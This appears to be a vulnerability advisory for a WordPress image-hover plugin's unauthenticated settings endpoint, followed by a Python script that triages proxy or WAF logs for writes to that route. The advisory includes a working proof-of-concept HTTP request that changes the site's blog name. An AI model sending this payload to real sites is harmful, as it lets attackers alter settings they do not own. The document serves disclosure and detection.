The plugin does not have any authorisation in its REST API endpoints, one of which could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue as being fixed in 9.6.2; however, it was still possible for attackers to exploit it, and proper remediation was done in 9.7.0.

POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close

rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D
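
For sites still on a version below 9.7.0, proxy or WAF request logs can be checked for writes to this route. The following is an added example, not code from the plugin or the original report; it decodes the rawdata parameter and reports which option a request tried to change. The "oxi_" option prefix and the function names are assumptions made for illustration.

```python
import json
from urllib.parse import parse_qs, urlsplit

ROUTE = "/imagehoverultimate/v1/oxi_settings"   # route from the request above, lowercased
PLUGIN_OPTION_PREFIXES = ("oxi_",)              # assumption: prefix of the plugin's own options


def rest_route(target):
    """Return the REST route for both /wp-json/<route> and ?rest_route=<route> URLs."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if "rest_route" in query:
        route = query["rest_route"][0]
    else:
        route = parts.path.partition("/wp-json")[2]
    return route.rstrip("/").lower()             # compared case-insensitively


def triage(method, target, headers, body):
    """Return a finding for a settings write to the affected route, else None."""
    if method.upper() != "POST" or rest_route(target) != ROUTE:
        return None
    hdrs = {k.lower(): v for k, v in headers.items()}
    # A login cookie or REST nonce only shows that a session was presented,
    # not that the plugin checked it.
    has_session = "x-wp-nonce" in hdrs or "wordpress_logged_in_" in hdrs.get("cookie", "")
    option = None
    try:
        # rawdata is a URL-encoded JSON object: {"name": <option>, "value": <new value>}
        option = json.loads(parse_qs(body, strict_parsing=True)["rawdata"][0])["name"]
    except (ValueError, KeyError, TypeError):
        pass  # malformed body: still report the request, without an option name
    outside = option is not None and not str(option).startswith(PLUGIN_OPTION_PREFIXES)
    severity = "high" if outside or not has_session else "review"
    return {"option": option, "has_session": has_session, "severity": severity}


# Constructed sample: the request shown above, as a proxy or WAF log would record it.
SAMPLE = ("POST", "/wp-json/ImageHoverUltimate/v1/oxi_settings",
          {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
           "X-Requested-With": "XMLHttpRequest"},
          "rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D")

if __name__ == "__main__":
    print(triage(*SAMPLE))
```

A "high" finding for an option outside the plugin's own settings on a pre-9.7.0 install is a reason to compare the current value of that option with a known-good backup.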